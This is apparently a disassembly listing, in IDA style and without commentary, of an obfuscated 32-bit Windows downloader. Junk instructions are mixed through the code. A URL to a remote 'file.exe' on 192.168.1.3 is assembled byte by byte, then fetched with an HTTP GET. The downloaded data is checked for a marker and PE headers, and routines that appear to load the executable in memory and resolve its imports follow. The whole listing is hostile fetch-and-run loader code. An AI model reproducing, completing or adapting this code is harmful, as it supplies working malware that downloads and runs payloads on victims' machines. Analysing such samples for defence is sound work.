mov dh, 56h
mov edi, [ebx+165h]
add edi, 0Ch
and dh, 78h
mov eax, [edi]
add [ebx+672h], eax
mov eax, [ebx+672h]
mov [ebx+1CCh], eax
and ch, 95h
add dl, 9Fh
sub esp, 4
mov ch, 0D4h
mov eax, [ebx+1CCh]
mov [esp+2Ch+var_2C], eax
and dl, 7
call dword ptr [ebx+437h]
mov [ebx+322h], eax
mov eax, [ebx+322h]
mov [ebx+38Ah], eax
and al, 23h
cmp dword ptr [ebx+38Ah], 0
jz short loc_403080
jmp short loc_40308A
; ---------------------------------------------------------------------------
loc_403080: ; CODE XREF: sub_402EE6+196�j
mov eax, 0
jmp locret_40318D
; ---------------------------------------------------------------------------
loc_40308A: ; CODE XREF: sub_402EE6+198�j
mov eax, [ebp+arg_0]
mov [ebx+260h], eax
mov edi, [ebx+165h]
add edi, 10h
mov eax, [edi]
add [ebx+260h], eax
mov eax, [ebx+260h]
mov [ebx+1D1h], eax
loc_4030B0: ; CODE XREF: sub_402EE6+28F�j
mov al, 0C9h
mov esi, [ebx+1D1h]
cmp dword ptr [esi], 0
jnz short loc_4030C2
jmp loc_40317A
; ---------------------------------------------------------------------------
loc_4030C2: ; CODE XREF: sub_402EE6+1D5�j
mov esi, [ebx+1D1h]
cmp dword ptr [esi], 8000000h
jl short loc_4030DA
sub dh, 8Dh
mov ch, 40h
jmp loc_40317A
; ---------------------------------------------------------------------------
loc_4030DA: ; CODE XREF: sub_402EE6+1E8�j
mov edi, [ebx+1D1h]
mov eax, [edi]
mov [ebx+37Eh], eax
mov eax, [ebp+arg_0]
add [ebx+37Eh], eax
mov eax, [ebx+37Eh]
mov [ebx+217h], eax
or dh, 56h
add dword ptr [ebx+217h], 2
mov eax, [ebx+217h]
mov [ebx+5DDh], eax
sub esp, 8
add ah, 0D6h
mov eax, [ebx+38Ah]
mov [esp+30h+var_30], eax
add dl, 0D6h
or ah, 9Dh
mov eax, [ebx+5DDh]
mov [esp+30h+var_2C], eax
add dh, 98h
mov dh, 8Fh
call dword ptr [ebx+1C4h]
mov [ebx+175h], eax
mov eax, [ebx+175h]
mov [ebx+64h], eax
mov dl, 4
cmp dword ptr [ebx+64h], 0
jz short loc_403156
jmp short loc_40315D
; ---------------------------------------------------------------------------
loc_403156: ; CODE XREF: sub_402EE6+26C�j
mov eax, 0
jmp short locret_40318D
; ---------------------------------------------------------------------------
loc_40315D: ; CODE XREF: sub_402EE6+26E�j
mov esi, [ebx+1D1h]
mov eax, [ebx+64h]
mov [esi], eax
add dword ptr [ebx+1D1h], 4
xor cl, 2Eh
add dl, 9Ch
jmp loc_4030B0
; ---------------------------------------------------------------------------
loc_40317A: ; CODE XREF: sub_402EE6+1D7�j
; sub_402EE6+1EF�j
add dword ptr [ebx+165h], 14h
jmp loc_402FFB
; ---------------------------------------------------------------------------
loc_403186: ; CODE XREF: sub_402EE6+12B�j
mov eax, 1
jmp short $+2
locret_40318D: ; CODE XREF: sub_402EE6+32�j
; sub_402EE6+6F�j ...
leave
retn 8
sub_402EE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403191 proc near ; CODE XREF: start+1D0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
mov ebx, dword_403200
mov dword ptr [ebx+65Eh], 0
loc_4031A7: ; CODE XREF: sub_403191+5A�j
sub cl, 93h
mov esi, [ebp+arg_4]
add esi, [ebx+65Eh]
cmp byte ptr [esi], 0
jnz short loc_4031BF
sub ch, 36h
mov dl, 67h
jmp short loc_4031ED
; ---------------------------------------------------------------------------
loc_4031BF: ; CODE XREF: sub_403191+25�j
mov esi, [ebp+arg_0]
add esi, [ebx+65Eh]
mov edi, [ebp+arg_4]
add edi, [ebx+65Eh]
mov al, [edi]
mov [esi], al
mov eax, [ebx+65Eh]
mov [ebx+189h], eax
add dword ptr [ebx+65Eh], 1
or cl, 27h
jmp short loc_4031A7
; ---------------------------------------------------------------------------
loc_4031ED: ; CODE XREF: sub_403191+2C�j
mov esi, [ebp+arg_0]
add esi, [ebx+65Eh]
mov byte ptr [esi], 0
xor dl, 0A9h
leave
retn 8
sub_403191 endp
; ---------------------------------------------------------------------------
dword_403200 dd 6F7F8h ; DATA XREF: sub_401000+6�r
; sub_40105A+6�r ...
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_7D8 = dword ptr -7D8h
var_7D4 = dword ptr -7D4h
var_7D0 = dword ptr -7D0h
var_7CC = dword ptr -7CCh
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
sub esp, 7A0h
mov ebx, esp
mov dword_403200, esp
mov eax, ds:dword_404037
mov [ebx+437h], eax
mov eax, ds:dword_40403B
mov [ebx+1C4h], eax
call sub_401DC8
mov [ebx+195h], eax
mov dword ptr [ebx+20Fh], 100000h
mov dword ptr [ebx+5D9h], 300000h
and ch, 0B3h
sub esp, 10h
mov [esp+7D8h+var_7D8], 6000000h
add ch, 73h
mov ah, 18h
mov [esp+7D8h+var_7D4], 300000h
and dh, 53h
add ch, 0EFh
mov al, 1Fh
mov [esp+7D8h+var_7D0], 3000h
sub dl, 8Eh
mov [esp+7D8h+var_7CC], 40h
mov cl, 0F4h
call dword ptr [ebx+1F6h]
mov [ebx+1ABh], eax
mov eax, [ebx+1ABh]
mov [ebx+5CDh], eax
sub esp, 4
lea eax, [ebx+475h]
mov [esp+2Ch+var_2C], eax
and cl, 0B2h
xor ch, 0D9h
call sub_401470
mov [ebx+1EEh], eax
cmp dword ptr [ebx+1EEh], 0
jz short loc_4032C7
jmp loc_4033DF
; ---------------------------------------------------------------------------
loc_4032C7: ; CODE XREF: start+BC�j
mov byte ptr [ebx+77h], 31h
sub dh, 24h
mov byte ptr [ebx+89h], 78h
mov byte ptr [ebx+7Bh], 31h
sub cl, 8Eh
mov byte ptr [ebx+7Ah], 2Eh
mov byte ptr [ebx+73h], 31h
xor dh, 0D1h
mov byte ptr [ebx+7Eh], 2Fh
add ch, 0FEh
mov byte ptr [ebx+8Ah], 65h
and cl, 6Bh
mov byte ptr [ebx+75h], 32h
add cl, 0C2h
or ch, 0BDh
mov byte ptr [ebx+80h], 68h
sub cl, 13h
xor dl, 1Ch
mov byte ptr [ebx+72h], 2Fh
mov byte ptr [ebx+86h], 65h
sub dl, 77h
mov byte ptr [ebx+81h], 70h
or dl, 28h
mov byte ptr [ebx+7Dh], 33h
mov byte ptr [ebx+79h], 38h
mov dh, 85h
sub ch, 25h
mov byte ptr [ebx+74h], 39h
xor ch, 5Ch
mov dh, 0EEh
mov byte ptr [ebx+70h], 3Ah
or dh, 6Ch
mov byte ptr [ebx+6Dh], 74h
xor dh, 0CEh
mov byte ptr [ebx+84h], 69h
mov byte ptr [ebx+85h], 6Ch
xor ch, 58h
and dl, 64h
mov byte ptr [ebx+82h], 2Fh
sub dl, 67h
mov byte ptr [ebx+8Bh], 0
mov byte ptr [ebx+7Fh], 70h
mov byte ptr [ebx+6Ch], 68h
sub cl, 87h
mov byte ptr [ebx+78h], 36h
mov byte ptr [ebx+76h], 2Eh
mov byte ptr [ebx+71h], 2Fh
mov byte ptr [ebx+88h], 65h
mov byte ptr [ebx+6Fh], 70h
add ch, 76h
or dh, 0CAh
mov byte ptr [ebx+87h], 2Eh
mov byte ptr [ebx+7Ch], 2Eh
add cl, 97h
mov byte ptr [ebx+83h], 66h
and dh, 32h
xor ch, 0ABh
mov byte ptr [ebx+6Eh], 74h
sub esp, 8
mov cl, 0Dh
lea eax, [ebx+475h]
mov [esp+30h+var_30], eax
or ch, 42h
xor al, 7Ah
lea edi, [ebx+6Ch]
mov [esp+30h+var_2C], edi
and dh, 0CDh
call sub_403191
mov [ebx+18Dh], eax
loc_4033DF: ; CODE XREF: start+BE�j
sub esp, 8
mov dl, 98h
lea eax, [ebx+475h]
mov [esp+30h+var_30], eax
mov dl, 2Fh
mov dl, 3Dh
lea edi, [ebx+76Bh]
mov [esp+30h+var_2C], edi
xor cl, 0D0h
add dh, 73h
call sub_40352E
mov [ebx+747h], eax
mov eax, [ebx+747h]
mov [ebx+627h], eax
mov eax, [ebx+627h]
mov [ebx+1C8h], eax
add cl, 0F1h
mov dl, 0EEh
cmp dword ptr [ebx+1C8h], 0
jnz short loc_403437
jmp loc_403511
; ---------------------------------------------------------------------------
loc_403437: ; CODE XREF: start+22C�j
mov esi, [ebx+1C8h]
cmp dword ptr [esi], 53524358h
jz short loc_403447
jmp short loc_4034B6
; ---------------------------------------------------------------------------
loc_403447: ; CODE XREF: start+23F�j
mov eax, [ebx+1C8h]
mov [ebx+0CFh], eax
sub dh, 9Bh
add dword ptr [ebx+0CFh], 4
mov eax, [ebx+0CFh]
mov [ebx+1C8h], eax
or dh, 70h
mov eax, [ebx+76Bh]
mov [ebx+656h], eax
mov ch, 7Ch
sub dword ptr [ebx+656h], 4
mov eax, [ebx+656h]
mov [ebx+76Bh], eax
sub ch, 0DAh
sub cl, 0A1h
sub esp, 8
mov eax, [ebx+1C8h]
mov [esp+30h+var_30], eax
sub al, 2Ah
mov eax, [ebx+76Bh]
mov [esp+30h+var_2C], eax
call sub_4019DC
mov [ebx+199h], eax
loc_4034B6: ; CODE XREF: start+241�j
sub esp, 1Ch
mov ch, 0B9h
mov eax, [ebx+1C8h]
mov [esp+44h+var_44], eax
mov eax, [ebx+5CDh]
mov [esp+44h+var_40], eax
add ah, 73h
mov eax, [ebx+76Bh]
mov [esp+44h+var_3C], eax
and ch, 3Fh
xor ah, 3Fh
mov eax, [ebp+arg_0]
mov [esp+44h+var_38], eax
or al, 46h
mov eax, [ebp+arg_4]
mov [esp+44h+var_34], eax
mov dh, 0BDh
mov eax, [ebp+arg_8]
mov [esp+44h+var_30], eax
mov eax, [ebp+arg_C]
mov [esp+44h+var_2C], eax
mov ch, 1
add cl, 48h
call sub_403CF9
mov [ebx+76Fh], eax
loc_403511: ; CODE XREF: start+22E�j
sub esp, 4
mov [esp+2Ch+var_2C], 0
or dh, 0ABh
mov ch, 0C6h
call dword ptr [ebx+5FFh]
mov [ebx+15Dh], eax
leave
retn
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40352E proc near ; CODE XREF: start+1FD�p
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 94h
mov ebx, dword_403200
cmp dword ptr [ebx+617h], 0
jz short loc_4035C2
or al, 6Fh
cmp dword ptr [ebx+1FEh], 0
jz short loc_4035C2
sub dl, 1Eh
cmp dword ptr [ebx+75Fh], 0
jz short loc_4035C2
cmp dword ptr [ebx+0D3h], 0
jz short loc_4035C2
or dl, 4Fh
cmp dword ptr [ebx+382h], 0
jz short loc_4035C2
xor ah, 0EDh
cmp dword ptr [ebx+37Ah], 0
jz short loc_4035C2
mov dh, 0FCh
cmp dword ptr [ebx+155h], 0
jz short loc_4035C2
mov al, 0C5h
cmp dword ptr [ebx+447h], 0
jz short loc_4035C2
mov ch, 0BFh
cmp dword ptr [ebx+8Ch], 0
jz short loc_4035C2
add ch, 53h
cmp dword ptr [ebx+6BFh], 0
jz short loc_4035C2
sub dh, 0B5h
cmp dword ptr [ebx+31Eh], 0
jz short loc_4035C2
cmp dword ptr [ebx+767h], 0
jz short loc_4035C2
jmp short loc_4035CC
; ---------------------------------------------------------------------------
loc_4035C2: ; CODE XREF: sub_40352E+16�j
; sub_40352E+21�j ...
mov eax, 0
jmp locret_403CF5
; ---------------------------------------------------------------------------
loc_4035CC: ; CODE XREF: sub_40352E+92�j
lea esi, [ebx+6C3h]
add esi, 0
mov byte ptr [esi], 0
add cl, 3Eh
lea esi, [ebx+396h]
add esi, 0
mov byte ptr [esi], 0
or dl, 12h
lea esi, [ebx+286h]
add esi, 0
mov byte ptr [esi], 0
mov dword ptr [ebx+585h], 0
mov dword ptr [ebx+25Ch], 0
xor dh, 85h
sub dh, 96h
mov dword ptr [ebx+90h], 0
mov dword ptr [ebx+6A2h], 0
mov cl, 2Eh
mov dword ptr [ebx+589h], 0
mov dword ptr [ebx+306h], 0
mov esi, [ebp+arg_4]
mov dword ptr [esi], 0
sub dh, 2Dh
sub ch, 41h
sub esp, 0Ch
and ah, 0F2h
lea edi, [ebx+10Dh]
mov [esp+0A0h+var_A0], edi
mov [esp+0A0h+var_9C], 0
mov [esp+0A0h+var_98], 3Ch
call sub_401000
mov [ebx+159h], eax
lea esi, [ebx+10Dh]
add esi, 0
sub cl, 28h
mov dword ptr [esi], 3Ch
lea esi, [ebx+10Dh]
add esi, 10h
lea eax, [ebx+6C3h]
mov [esi], eax
mov dl, 7Fh
sub ch, 0
mov dword ptr [ebx+223h], 7Fh
lea esi, [ebx+10Dh]
add esi, 14h
mov dword ptr [esi], 7Fh
xor ch, 13h
and dh, 0FBh
lea esi, [ebx+10Dh]
add esi, 2Ch
add dh, 9Ch
lea eax, [ebx+396h]
mov [esi], eax
mov dl, 0A0h
xor dh, 8Eh
mov dword ptr [ebx+74Bh], 7Fh
sub dh, 30h
lea esi, [ebx+10Dh]
add esi, 30h
or ch, 4Dh
mov dword ptr [esi], 7Fh
or ch, 8Bh
sub esp, 4
and ah, 28h
mov eax, [ebp+arg_0]
mov [esp+98h+var_98], eax
call sub_40105A
mov [ebx+181h], eax
sub esp, 10h
mov eax, [ebp+arg_0]
mov [esp+0A4h+var_A4], eax
xor cl, 78h
mov eax, [ebx+181h]
mov [esp+0A4h+var_A0], eax
mov cl, 76h
and dh, 0BCh
mov ah, 1
mov [esp+0A4h+var_9C], 0
add dl, 94h
and dh, 0A6h
add ch, 97h
lea edi, [ebx+10Dh]
mov [esp+0A4h+var_98], edi
mov dl, 90h
and ch, 78h
call dword ptr [ebx+1FEh]
mov [ebx+29h], eax
mov ah, 0C0h
cmp dword ptr [ebx+29h], 0
jz short loc_40375C
jmp short loc_403766
; ---------------------------------------------------------------------------
loc_40375C: ; CODE XREF: sub_40352E+22A�j
mov eax, 0
jmp locret_403CF5
; ---------------------------------------------------------------------------
loc_403766: ; CODE XREF: sub_40352E+22C�j
mov byte ptr [ebx+777h], 0
sub esp, 14h
lea edi, [ebx+777h]
mov [esp+0A8h+var_A8], edi
sub dl, 3
sub cl, 0C9h
sub al, 1
mov [esp+0A8h+var_A4], 0
mov [esp+0A8h+var_A0], 0
or dl, 4Ch
or ch, 7Bh
mov [esp+0A8h+var_9C], 0
mov ch, 9Eh
sub dh, 80h
and cl, 0A8h
mov [esp+0A8h+var_98], 0
call dword ptr [ebx+75Fh]
mov [ebx+149h], eax
mov eax, [ebx+149h]
mov [ebx+6A2h], eax
sub ch, 5Bh
add cl, 27h
cmp dword ptr [ebx+6A2h], 0
jz short loc_4037D8
jmp short loc_4037E2
; ---------------------------------------------------------------------------
loc_4037D8: ; CODE XREF: sub_40352E+2A6�j
mov eax, 0
jmp locret_403CF5
; ---------------------------------------------------------------------------
loc_4037E2: ; CODE XREF: sub_40352E+2A8�j
mov byte ptr [ebx+0DFh], 0
mov ch, 7Eh
sub dh, 1
mov byte ptr [ebx+1BBh], 0
add dh, 87h
sub esp, 20h
mov eax, [ebx+6A2h]
mov [esp+0B4h+var_B4], eax
lea eax, [ebx+6C3h]
mov [esp+0B4h+var_B0], eax
and dl, 76h
lea edi, [ebx+10Dh]
add edi, 18h
mov eax, [edi]
mov [esp+0B4h+var_AC], eax
sub ch, 31h
or dl, 6Ch
lea edi, [ebx+0DFh]
mov [esp+0B4h+var_A8], edi
mov cl, 0B2h
lea edi, [ebx+1BBh]
mov [esp+0B4h+var_A4], edi
and dh, 0CDh
mov [esp+0B4h+var_A0], 3
add ah, 0D6h
mov [esp+0B4h+var_9C], 0
mov [esp+0B4h+var_98], 0
call dword ptr [ebx+0D3h]
mov [ebx+68Eh], eax
mov eax, [ebx+68Eh]
mov [ebx+589h], eax
sub dl, 57h
xor dh, 6Dh
cmp dword ptr [ebx+589h], 0
jz short loc_403883
jmp short loc_40388D
; ---------------------------------------------------------------------------
loc_403883: ; CODE XREF: sub_40352E+351�j
mov eax, 0
jmp locret_403CF5
; ---------------------------------------------------------------------------
loc_40388D: ; CODE XREF: sub_40352E+353�j
mov byte ptr [ebx+5C9h], 47h
sub dh, 79h
mov byte ptr [ebx+5CAh], 45h
xor dl, 0D9h
and cl, 0BFh
mov byte ptr [ebx+5CBh], 54h
and cl, 0CDh
mov byte ptr [ebx+5CCh], 0
mov dh, 66h
or cl, 0E8h
mov dword ptr [ebx+48h], 84000000h
and ch, 0FEh
add cl, 0C9h
sub esp, 20h
or dh, 0C1h
mov eax, [ebx+589h]
mov [esp+0B4h+var_B4], eax
xor dl, 0FBh
add dh, 8
lea edi, [ebx+5C9h]
mov [esp+0B4h+var_B0], edi
lea eax, [ebx+396h]
mov [esp+0B4h+var_AC], eax
and dl, 9Fh
or ch, 0AAh
or dh, 0B3h
mov [esp+0B4h+var_A8], 0
and dh, 0Bh
mov [esp+0B4h+var_A4], 0
mov [esp+0B4h+var_A0], 0
sub cl, 84h
mov [esp+0B4h+var_9C], 84000000h
sub dh, 0Bh
xor cl, 80h
mov [esp+0B4h+var_98], 0
sub cl, 0BBh
or dl, 0F1h
call dword ptr [ebx+382h]
mov [ebx+342h], eax
mov eax, [ebx+342h]
mov [ebx+306h], eax
sub cl, 45h
xor cl, 7
cmp dword ptr [ebx+306h], 0
jz short loc_40395C
jmp short loc_403966
; ---------------------------------------------------------------------------
loc_40395C: ; CODE XREF: sub_40352E+42A�j
mov eax, 0
jmp locret_403CF5
; ---------------------------------------------------------------------------
loc_403966: ; CODE XREF: sub_40352E+42C�j
sub esp, 14h
add al, 8Ah
mov eax, [ebx+306h]
mov [esp+0A8h+var_A8], eax
sub dh, 62h
mov [esp+0A8h+var_A4], 0
or dl, 0B8h
or ch, 83h
mov [esp+0A8h+var_A0], 0
or cl, 4Dh
mov cl, 31h
mov [esp+0A8h+var_9C], 0
mov [esp+0A8h+var_98], 0
call dword ptr [ebx+155h]
mov [ebx+30Eh], eax
mov ch, 2Dh
cmp dword ptr [ebx+30Eh], 0
jz short loc_4039BB
jmp short loc_4039C5
; ---------------------------------------------------------------------------
loc_4039BB: ; CODE XREF: sub_40352E+489�j
mov eax, 0
jmp locret_403CF5
; ---------------------------------------------------------------------------
loc_4039C5: ; CODE XREF: sub_40352E+48B�j
mov dword ptr [ebx+5E5h], 7Eh
mov dword ptr [ebx+780h], 7Eh
add dh, 1Ch
xor dl, 23h
sub esp, 14h
mov al, 0EEh
mov eax, [ebx+306h]
mov [esp+0A8h+var_A8], eax
sub ch, 76h
or cl, 5Dh
sub ch, 7
mov [esp+0A8h+var_A4], 5
and dh, 0FEh
lea edi, [ebx+286h]
mov [esp+0A8h+var_A0], edi
sub dh, 7Eh
or ah, 0CEh
lea edi, [ebx+780h]
mov [esp+0A8h+var_9C], edi
xor cl, 77h
mov [esp+0A8h+var_98], 0
mov dh, 0D3h
call dword ptr [ebx+447h]
mov [ebx+753h], eax
or dh, 1Dh
cmp dword ptr [ebx+753h], 0
jz short loc_403A42
jmp short loc_403A4C
; ---------------------------------------------------------------------------
loc_403A42: ; CODE XREF: sub_40352E+510�j
mov eax, 0
jmp locret_403CF5
; ---------------------------------------------------------------------------
loc_403A4C: ; CODE XREF: sub_40352E+512�j
lea esi, [ebx+286h]
add esi, [ebx+780h]
mov byte ptr [esi], 0
mov cl, 21h
add cl, 0Bh
lea edi, [ebx+286h]
add edi, 0
mov [ebx+44Fh], edi
and ch, 9
and dh, 0F6h
loc_403A75: ; CODE XREF: sub_40352E+5A8�j
mov esi, [ebx+44Fh]
cmp byte ptr [esi], 0
jnz short loc_403A82
jmp short loc_403AD8
; ---------------------------------------------------------------------------
loc_403A82: ; CODE XREF: sub_40352E+550�j
xor eax, eax
or dl, 0EBh
add cl, 0B4h
xor edx, edx
mov cl, 65h
xor ecx, ecx
mov eax, [ebx+585h]
mov ecx, 0Ah
mul ecx
mov [ebx+585h], eax
mov edi, [ebx+44Fh]
mov al, [edi]
mov [ebx+108h], al
xor dl, 94h
sub byte ptr [ebx+108h], 30h
xor eax, eax
mov al, [ebx+108h]
add [ebx+585h], eax
add dword ptr [ebx+44Fh], 1
or dh, 0F5h
xor cl, 49h
jmp short loc_403A75
; ---------------------------------------------------------------------------
loc_403AD8: ; CODE XREF: sub_40352E+552�j
call dword ptr [ebx+37Ah]
mov [ebx+763h], eax
sub esp, 0Ch
mov eax, [ebx+763h]
mov [esp+0A0h+var_A0], eax
xor ch, 4
mov dl, 0A5h
or cl, 90h
mov [esp+0A0h+var_9C], 0
mov eax, [ebx+585h]
mov [esp+0A0h+var_98], eax
mov dh, 0D2h
and cl, 1Ch
call dword ptr [ebx+617h]
mov [ebx+416h], eax
mov eax, [ebx+416h]
mov [ebx+44h], eax
add dl, 0Eh
cmp dword ptr [ebx+44h], 0
jz short loc_403B2F
jmp short loc_403B39
; ---------------------------------------------------------------------------
loc_403B2F: ; CODE XREF: sub_40352E+5FD�j
mov eax, 0
jmp locret_403CF5
; ---------------------------------------------------------------------------
loc_403B39: ; CODE XREF: sub_40352E+5FF�j
; sub_40352E+6A4�j ...
or al, 4Bh
mov eax, [ebx+585h]
cmp [ebx+90h], eax
jl short loc_403B4E
jmp loc_403C88
; ---------------------------------------------------------------------------
loc_403B4E: ; CODE XREF: sub_40352E+619�j
mov dword ptr [ebx+25Ch], 0
mov dh, 45h
sub ch, 0E8h
sub esp, 10h
xor cl, 0C8h
mov eax, [ebx+306h]
mov [esp+0A4h+var_A4], eax
or cl, 63h
mov al, 93h
lea edi, [ebx+25Ch]
mov [esp+0A4h+var_A0], edi
mov [esp+0A4h+var_9C], 0
mov [esp+0A4h+var_98], 0
or cl, 13h
call dword ptr [ebx+8Ch]
mov [ebx+757h], eax
cmp dword ptr [ebx+757h], 0
jz short loc_403BA5
jmp short loc_403BAA
; ---------------------------------------------------------------------------
loc_403BA5: ; CODE XREF: sub_40352E+673�j
jmp loc_403C88
; ---------------------------------------------------------------------------
loc_403BAA: ; CODE XREF: sub_40352E+675�j
mov al, 2Eh
cmp dword ptr [ebx+25Ch], 0
jz short loc_403BB7
jmp short loc_403BD7
; ---------------------------------------------------------------------------
loc_403BB7: ; CODE XREF: sub_40352E+685�j
sub esp, 4
mov [esp+98h+var_98], 64h
add dh, 19h
mov cl, 8Dh
call dword ptr [ebx+6BFh]
mov [ebx+44Bh], eax
jmp loc_403B39
; ---------------------------------------------------------------------------
loc_403BD7: ; CODE XREF: sub_40352E+687�j
mov dword ptr [ebx+25Ch], 0
sub dl, 0BBh
or dl, 7Fh
mov eax, [ebx+585h]
mov [ebx+0DBh], eax
add dl, 7Ch
and cl, 0Fh
mov eax, [ebx+90h]
sub [ebx+0DBh], eax
sub esp, 10h
mov eax, [ebx+306h]
mov [esp+0A4h+var_A4], eax
mov edi, [ebx+44h]
add edi, [ebx+90h]
mov [esp+0A4h+var_A0], edi
add cl, 9Fh
xor ch, 0A5h
sub al, 8Bh
mov eax, [ebx+0DBh]
mov [esp+0A4h+var_9C], eax
lea edi, [ebx+25Ch]
mov [esp+0A4h+var_98], edi
and cl, 0C4h
call dword ptr [ebx+31Eh]
mov [ebx+469h], eax
xor dh, 82h
cmp dword ptr [ebx+469h], 0
jz short loc_403C57
jmp short loc_403C59
; ---------------------------------------------------------------------------
loc_403C57: ; CODE XREF: sub_40352E+725�j
jmp short loc_403C88
; ---------------------------------------------------------------------------
loc_403C59: ; CODE XREF: sub_40352E+727�j
or ch, 0Fh
cmp dword ptr [ebx+25Ch], 0
jz short loc_403C67
jmp short loc_403C69
; ---------------------------------------------------------------------------
loc_403C67: ; CODE XREF: sub_40352E+735�j
jmp short loc_403C88
; ---------------------------------------------------------------------------
loc_403C69: ; CODE XREF: sub_40352E+737�j
mov eax, [ebx+25Ch]
add [ebx+90h], eax
mov esi, [ebp+arg_4]
mov eax, [ebx+25Ch]
add [esi], eax
or cl, 0A0h
jmp loc_403B39
; ---------------------------------------------------------------------------
loc_403C88: ; CODE XREF: sub_40352E+61B�j
; sub_40352E:loc_403BA5�j ...
or dh, 78h
mov eax, [ebx+585h]
cmp [ebx+90h], eax
jnz short loc_403C9B
jmp short loc_403CA2
; ---------------------------------------------------------------------------
loc_403C9B: ; CODE XREF: sub_40352E+769�j
mov eax, 0
jmp short locret_403CF5
; ---------------------------------------------------------------------------
loc_403CA2: ; CODE XREF: sub_40352E+76B�j
sub esp, 4
mov eax, [ebx+306h]
mov [esp+98h+var_98], eax
add ch, 0A3h
call dword ptr [ebx+767h]
mov [ebx+3Ch], eax
sub esp, 4
mov eax, [ebx+589h]
mov [esp+98h+var_98], eax
xor cl, 15h
or cl, 0CDh
call dword ptr [ebx+767h]
mov [ebx+686h], eax
sub esp, 4
mov eax, [ebx+6A2h]
mov [esp+98h+var_98], eax
call dword ptr [ebx+767h]
mov [ebx+185h], eax
mov eax, [ebx+44h]
jmp short $+2
locret_403CF5: ; CODE XREF: sub_40352E+99�j
; sub_40352E+233�j ...
leave
retn 8
sub_40352E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CF9 proc near ; CODE XREF: start+302�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 2Ch
mov ebx, dword_403200
mov dword ptr [ebx+43Bh], 0
cmp dword ptr [ebx+1F6h], 0
jz short loc_403D1A
jmp short loc_403D1F
; ---------------------------------------------------------------------------
loc_403D1A: ; CODE XREF: sub_403CF9+1D�j
jmp locret_403F04
; ---------------------------------------------------------------------------
loc_403D1F: ; CODE XREF: sub_403CF9+1F�j
mov eax, [ebp+arg_0]
mov [ebx+1BCh], eax
or dl, 8Bh
mov ch, 0CEh
mov esi, [ebx+1BCh]
add esi, 0
sub ah, 0E0h
cmp word ptr [esi], 5A4Dh
jnz short loc_403D42
jmp short loc_403D47
; ---------------------------------------------------------------------------
loc_403D42: ; CODE XREF: sub_403CF9+45�j
jmp locret_403F04
; ---------------------------------------------------------------------------
loc_403D47: ; CODE XREF: sub_403CF9+47�j
mov eax, [ebp+arg_0]
mov [ebx+0FCh], eax
mov ch, 0D3h
mov cl, 0A9h
mov edi, [ebx+1BCh]
add edi, 3Ch
mov eax, [edi]
add [ebx+0FCh], eax
mov eax, [ebx+0FCh]
mov [ebx+282h], eax
mov ch, 0AAh
or dh, 0D9h
and ch, 0A5h
mov esi, [ebx+282h]
add esi, 14h
mov cl, 0B4h
cmp word ptr [esi], 0E0h
jnz short loc_403D8D
jmp short loc_403D92
; ---------------------------------------------------------------------------
loc_403D8D: ; CODE XREF: sub_403CF9+90�j
jmp locret_403F04
; ---------------------------------------------------------------------------
loc_403D92: ; CODE XREF: sub_403CF9+92�j
mov eax, [ebx+282h]
mov [ebx+68Ah], eax
sub dl, 79h
or ch, 62h
add dword ptr [ebx+68Ah], 18h
mov eax, [ebx+68Ah]
mov [ebx+75Bh], eax
and ch, 0DDh
mov eax, [ebx+75Bh]
mov [ebx+386h], eax
xor dl, 5Eh
add dword ptr [ebx+386h], 0E0h
mov eax, [ebx+386h]
mov [ebx+652h], eax
cmp [ebp+arg_4], 0
jz short loc_403DFA
mov edi, [ebx+75Bh]
add edi, 1Ch
or ch, 24h
mov eax, [edi]
cmp [ebp+arg_4], eax
jnz short loc_403DFA
jmp short loc_403DFF
; ---------------------------------------------------------------------------
loc_403DFA: ; CODE XREF: sub_403CF9+EA�j
; sub_403CF9+FD�j
jmp locret_403F04
; ---------------------------------------------------------------------------
loc_403DFF: ; CODE XREF: sub_403CF9+FF�j
sub esp, 18h
mov eax, [ebp+arg_0]
mov [esp+44h+var_44], eax
sub dh, 20h
and ah, 0C6h
mov eax, [ebx+1BCh]
mov [esp+44h+var_40], eax
mov dl, 7Dh
sub al, 90h
mov eax, [ebx+282h]
mov [esp+44h+var_3C], eax
xor dl, 0C2h
mov eax, [ebx+75Bh]
mov [esp+44h+var_38], eax
sub dl, 6Ch
or cl, 3Fh
xor ch, 20h
mov eax, [ebx+652h]
mov [esp+44h+var_34], eax
mov dh, 0B9h
xor cl, 63h
mov eax, [ebp+arg_4]
mov [esp+44h+var_30], eax
call sub_401A70
mov [ebx+0C3h], eax
sub esp, 8
mov eax, [ebp+arg_4]
mov [esp+34h+var_34], eax
mov ch, 0EEh
or dl, 56h
mov ah, 4Ch
mov eax, [ebx+75Bh]
mov [esp+34h+var_30], eax
sub cl, 0Ch
call sub_402EE6
mov [ebx+41Ah], eax
cmp dword ptr [ebx+41Ah], 0
jz short loc_403E90
jmp short loc_403E92
; ---------------------------------------------------------------------------
loc_403E90: ; CODE XREF: sub_403CF9+193�j
jmp short locret_403F04
; ---------------------------------------------------------------------------
loc_403E92: ; CODE XREF: sub_403CF9+195�j
mov eax, [ebp+arg_4]
